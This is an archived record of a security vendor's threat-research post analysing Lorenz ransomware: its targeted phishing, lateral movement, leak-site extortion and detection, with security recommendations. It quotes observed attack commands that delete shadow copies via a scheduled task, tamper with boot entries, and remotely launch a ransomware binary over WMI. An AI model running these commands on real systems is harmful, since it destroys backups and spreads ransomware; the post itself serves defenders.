{
	"id": "8141a27f-551c-4b98-b0b6-3bb85cc2dba8",
	"created_at": "2026-04-06T01:31:09.737499Z",
	"updated_at": "2026-04-10T03:21:45.295587Z",
	"deleted_at": null,
	"sha1_hash": "5eb4cbd5cb6e06cc6a66aedeb080f40f103f2422",
	"title": "Cybereason vs. Lorenz Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2446060,
	"plain_text": "Cybereason vs. Lorenz Ransomware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-06 00:52:25 UTC\r\nLorenz is a ransomware strain observed first in February of 2021, and is believed to be a rebranding of the “.sZ40”\r\nransomware that was discovered in October 2020. Lorenz targets organizations worldwide with customized attacks\r\ndemanding hundreds of thousands of dollars, and even millions in ransom fee. \r\nThe group is targeting victims mostly in English-speaking countries, and according to their website, the group has published\r\nstolen data from more than 20 victims, although the estimated number of successful attacks is believed to be higher.\r\nCybereason detects and prevents Lorenz Ransomware\r\nAccording reports, Lorenz appears to be the same as ThunderCrypt ransomware observed all the way back in May 2017.\r\nHowever, it’s not clear if Lorenz was created by the same group or if the group purchased the source code of ThunderCrypt\r\nand created its own variant.\r\nShortly after Lorenz was discovered, the group faced a temporary problem after researchers published a free decryptor\r\n(download here). The decryptor was released by the project No More Ransom, a joint project by law enforcement agencies\r\nincluding Europol's European Cybercrime Center.\r\nIt’s worth noting that that decrypter is very limited and only supports .docx, .pptx, .xlsx and .zip. 
In addition, in the test that we ran for both old and newer samples, the decryptor did not work and kept alerting that it doesn’t support the files (we tried encrypted docx files of the \u003cname\u003e.docx.Lorenz.sz40 type):\r\nhttps://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware\r\nPage 1 of 13\r\nLorenz Leaks website\r\nKey Details\r\nEver Evolving Ransomware: The Lorenz group keeps changing the ransomware capabilities and behavior frequently, customizing it to their victims.\r\nHigh Severity: The Cybereason Nocturnus Team assesses the threat level as HIGH given the destructive potential of the attacks.\r\nHuman Operated Attack: Prior to the deployment of the ransomware, the attackers attempt to infiltrate and move laterally throughout the organization, carrying out a fully-developed RansomOps attack.\r\nInteresting Way of Leaking Data: The Lorenz group's data leak process has several steps: selling the data to other threat actors, releasing password-protected RAR archives containing the victim's data, and also selling databases and access to internal networks.\r\nDetected and Prevented: The Cybereason XDR Platform fully detects and prevents the Lorenz ransomware.\r\nBreaking Down the Attack\r\nNot A Typical Spear-Phishing Attack\r\nThe Lorenz operators put a lot of effort into their attacks. They study their target’s employees, suppliers and partners. This way, the Lorenz group can even go from one, already compromised, victim to another. The knowledge they have collected is used to customize the attack specifically for the target.\r\nIn a reported incident, the attackers used one compromised victim to “jump” to another. The group gained access to the network via a phishing email, but not just any phishing email. The group, after doing their research on the target, sent the email from a legitimate email account of a real employee at a supplier that they had already compromised. 
This way the email appears to be legitimate and increases the chances of the recipient falling for the scam.\r\nThen the attackers trick employees into installing an application that provides the attackers with full access to the network, including the employees’ email, even after they reset their passwords. In some cases, the attackers even used the compromised email accounts to email the IT, legal, and cyber insurance teams working with the targeted organization to threaten further attacks if they didn’t pay.\r\nDownloading the Ransomware\r\nAfter gaining an initial foothold in the network, the attackers start to run reconnaissance commands, move laterally within the network, and collect sensitive data including credentials, files, databases and emails.\r\nThe main goal for the attackers when moving laterally is to compromise a domain controller and obtain domain administrator credentials. This allows them to perform additional activities, and later on to sell access to the compromised network.\r\nSince the Lorenz group customizes the attack for the target, we have observed different Lorenz binaries with different behavior. This also suggests that the Lorenz group continues to update the ransomware, even if that means making changes frequently.\r\nRansomware Capabilities\r\nSince the ransomware binaries are customized for nearly every attack, there are different behaviors and capabilities observed in different samples, some of which were seen used in combination. Some of the capabilities were observed only in older versions, and some made a comeback in newer versions and then disappeared again. 
\r\nTo put things in order, the following are the main behaviors and capabilities observed among the ransomware binaries:\r\nDeleting the Shadow Copies\r\nSome of the Lorenz binaries observed used the well-known vssadmin command to delete the volume shadow copies of the system. Vssadmin.exe is a command-line tool that manages the Volume Shadow Copy Service (VSS), which captures and copies stable images for backup on running systems.\r\nRansomware commonly uses vssadmin.exe to delete shadow copies and other backups of files before encrypting the files themselves. This is another way to ensure that the victim will be forced to pay to decrypt the valuable files, since they can neither be decrypted nor retrieved from VSS.\r\nLorenz creates a scheduled task whose name starts with “sz40” and then sets it to run vssadmin with the following command line. After running, the scheduled task is deleted.\r\ncmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz403 /TR \"vssadmin Delete Shadows /For=C:\" \u0026SCHTASKS /run /TN sz403\u0026SCHTASKS /Delete /TN sz403 /F\r\nschtasks command as seen in the Cybereason XDR Platform\r\nCreating a New Boot Entry\r\nOne unique behavior observed in some of the Lorenz binaries is the creation of another boot entry, possibly for misleading purposes. A boot entry is a set of options that defines a load configuration for an operating system or bootable program. It is possible to have multiple boot entries for an operating system, each with a different set of boot parameters.\r\nLorenz uses the command-line utility bcdedit to copy the existing boot entry and modify it, which is the most common way to create a new boot entry. But it does one strange thing. 
The /timeout option is set to 100,000 seconds, which is about 27 (!) hours.\r\nBy doing so, the system waits 27 hours before the boot manager selects the default entry if the user doesn’t choose one manually. Since Lorenz changes the description of the boot entries to “Lorenz Encrypt System”, the user can be misled into thinking that the operating system is entirely compromised. In addition, if the system operates without user interaction, or is not on the network and cannot be connected to, it will not load the OS for 27 hours.\r\ncmd.exe /c bcdedit /copy {current} /d \"Lorenz Encrypt System\" \u0026 bcdedit /set {current} description \"Lorenz Encrypt System\" \u0026 bcdedit /timeout 100000 \u0026\u0026 ipconfig\r\nbcdedit command as seen in the Cybereason XDR Platform\r\nWindows boot manager after Lorenz infection\r\nCreating Remote Scheduled Tasks\r\nSome of the samples observed created a remote scheduled task that launches another ransomware binary located on a remote server within the infected network. This indicates that the attackers performed lateral movement in the environment, collected information and harvested credentials before launching the ransomware payload.\r\nThe scheduled task names observed in the binaries are consistent with the names found when creating other scheduled tasks in other binaries, and start with “sz40”. 
After execution, the malware deletes the scheduled task to remove its tracks.\r\nwmic /node:'\u003cIP\u003e' /USER:'\u003cdomain\u003e\\\u003cusername\u003e' /PASSWORD:'\u003cpassword\u003e' process call create \"cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\\\\u003cdomain\u003e\\NETLOGON\\weams.exe %windir%lsamp.exe \u0026 start %windir%lsamp.exe' \u0026 SCHTASKS /run /TN sz401\u0026SCHTASKS /Delete /TN sz401 /F\"\r\nChanging the Wallpaper\r\nSome Lorenz binaries are also configured to change the desktop image of the machine as an additional way to alert the user about what happened. The wallpaper image is either called “Lorenz.bmp” or has a random name. Lorenz drops the .bmp file into the %ProgramFiles% or %Windows% folder and then sets the relevant registry keys to configure it as the desktop wallpaper. The wallpaper is changed after a reboot of the machine:\r\nImage used as desktop background by Lorenz\r\nLorenz execution as shown in the Cybereason XDR Platform\r\nClearing Windows Event Logs\r\nSome older versions of Lorenz found on domain controllers were observed deleting the Windows Event Logs to remove tracks of the malicious activities. Among the logs deleted are the Windows PowerShell logs that contain information about PowerShell activities, which suggests the attacker used PowerShell at some point in the attack:\r\nClearing Event Logs command as seen in the Cybereason XDR Platform\r\nFile Encryption\r\nLorenz uses AES encryption to encrypt the files. For each encrypted file, it appends the extension “.Lorenz.sz40”. The original files are then deleted. 
In addition, Lorenz writes to each folder a ransom note named “HELP_SECURITY_EVENT.html” (recently changed to “HELP.txt”) that contains information about what happened to the files, including a link to the Lorenz data leak website and a unique TOR payment website where the victim can see the demanded ransom fee and contact the group:\r\nEncrypted files and ransom note\r\nLorenz ransom note\r\nAn Interesting Way of Leaking Stolen Data\r\nLorenz has created a relatively unique extortion technique. After stealing files, emails, credentials and databases from victims, the group threatens to publish them on their data leak website. When Lorenz publishes data, they do things a bit differently compared to other ransomware gangs.\r\nFirst, Lorenz makes the data available for sale to other threat actors, hackers or possible competitors. After a while, they start releasing password-protected RAR archives containing the victim's data. If no ransom is paid, and the data is not purchased, Lorenz releases the password for the RAR archives containing the data leak so that they are publicly available to anyone who downloads the files.\r\nBesides giving access to the stolen data, Lorenz, in order to maximize profit, sells access to the internal networks they have compromised. 
This trend is starting to gain popularity among other ransomware gangs as well, due to the understanding that for some threat actors, access to the networks could be more valuable than the data itself:\r\nLorenz Leaks website\r\nCybereason Detection and Prevention\r\nThe Cybereason XDR Platform is able to prevent the execution of the Lorenz ransomware using multi-layer protection that detects and blocks malware with threat intelligence, machine learning, and next-gen antivirus (NGAV) capabilities. Additionally, when the Anti-Ransomware feature is enabled, behavioral detection techniques in the platform are able to detect and prevent any attempt to encrypt files and generate a MalOp™ for it:\r\nMalOp for Lorenz ransomware as shown in the Cybereason XDR Platform\r\nUsing the Anti-Malware feature with the right configurations (listed in the recommendations below), the Cybereason XDR Platform will also detect and prevent the execution of the ransomware and ensure that it cannot encrypt targeted files. 
The prevention is based on machine learning, which blocks both known and unknown malware variants:\r\nCybereason user notification for preventing the execution of Lorenz - unknown hash\r\nSecurity Recommendations\r\nEnable the Anti-Ransomware Feature on Cybereason NGAV: Set Cybereason Anti-Ransomware protection mode to Prevent - more information for Cybereason customers can be found here\r\nEnable the Anti-Malware Feature on Cybereason NGAV: Set Cybereason Anti-Malware mode to Prevent and set the detection mode to Moderate or above - more information for Cybereason customers can be found here\r\nKeep Systems Fully Patched: Make sure your systems are patched in order to mitigate vulnerabilities\r\nRegularly Back Up Files to a Remote Server: Restoring your files from a backup is the fastest way to regain access to your data\r\nUse Security Solutions: Protect your environment using organizational firewalls, proxies, web filtering, and mail filtering\r\nIndicators of Compromise\r\nSHA256 - Lorenz binaries\r\nIP - C2\r\nMITRE ATT\u0026CK TECHNIQUES\r\nInitial Access: Phishing; Valid Accounts; Trusted Relationship\r\nLateral Movement: Taint Shared Content; Remote File Copy\r\nExecution: Command and Scripting Interpreter: PowerShell; Scheduled Task/Job; Windows Management Instrumentation\r\nDefense Evasion: Masquerading\r\nCredential Access: Credentials from Password Stores\r\nDiscovery: Account Discovery; System Information Discovery; File and Directory Discovery\r\nCollection: Data from Local System\r\nImpact: Data Encrypted for Impact; Inhibit System Recovery\r\nAbout the Researcher:\r\nLIOR ROCHBERGER, SENIOR THREAT RESEARCHER AND THREAT HUNTER, CYBEREASON\r\nAs part of the Nocturnus team at Cybereason, Lior has created procedures to lead threat hunting, reverse engineering and malware analysis teams. Lior has also been a contributing researcher to multiple threat and malware blogs including Bitbucket, Valak, Ramnit, and Raccoon stealer. Prior to Cybereason, Lior led SOC operations within the Israeli Air Force.\r\nAbout the Author\r\nCybereason Nocturnus\r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. 
The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nSource: https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware"
	],
	"report_names": [
		"cybereason-vs.-lorenz-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775439069,
	"ts_updated_at": 1775791305,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5eb4cbd5cb6e06cc6a66aedeb080f40f103f2422.pdf",
		"text": "https://archive.orkl.eu/5eb4cbd5cb6e06cc6a66aedeb080f40f103f2422.txt",
		"img": "https://archive.orkl.eu/5eb4cbd5cb6e06cc6a66aedeb080f40f103f2422.jpg"
	}
}